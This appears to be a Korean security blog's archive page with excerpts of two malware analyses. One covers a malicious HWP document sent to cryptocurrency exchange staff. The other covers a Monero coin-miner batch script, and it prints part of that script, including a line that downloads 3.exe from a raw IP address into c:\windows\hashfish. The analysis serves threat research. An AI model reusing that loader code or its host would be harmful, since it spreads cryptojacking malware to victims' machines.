본문 바로가기

2019/12

[악성코드 유포] 코인(토큰) 상장 문의 메일을 통한 한글 악성코드 유포 분석 1. 개요 최근 APT(Advanced Persistent Threat) 공격이 증가하고 있는 추세입니다. 최근에는 코인 거래소가 활성화되고, 돈이 되면서 거래소의 관계자를 노리기 위한 공격이 주를 이루고 있습니다. 이번에 분석하게 된 파일은 코인 상장 신청서를 통해 주요 코인거래소에 유포된 것으로 확인된 한글 파일을 간단하게 분석하였습니다. “해당 메일은 코인원 계정에 발송된 것으로 확인되었습니다.” 2. 최초 이메일 발송 정보 2. 파일 정보 파일명 [WhitePaper+소개]신규코인_상장_신청서2.hwp MD5 95fe089b63c095bfb2b25e8c6914d19d 한글 파일 제목 EXRAYA 백서 파일 생성 날짜 2019년 11월 3일 일요일 오후 4:21:45 비밀번호 12345 3. 세부 .. 더보기
XMR CoinMiner (BAT + Hashfish) 안녕하세요? 올만에 글을 쓰게 됩니다. 이번에 글을 쓰는 이유는 올만에 파일을 발견하였기 때문입니다. 간락히 쓰고 그냥 MD5 공유 하려고 합니다. 1. dll.bat - 인터넷에서 감염 추정 (8월 16일) / 파일 발견 일자 (9월 17일) 2. .bat 파일 구조 3. .bat 파일 실행 구조 (핵심) @echo off (웹 다운로드 부분) taskkill /im 3.exe /f md c:\windows\hashfish del c:\windows\hashfish\3.exe call :http "http://120.236.74.201:74/3.exe" c:\windows\hashfish\3.exe // SFX 압축 파일 (채굴 위한 악성코드) ping 127.0.0.1 -n 2 >nul if exis.. 더보기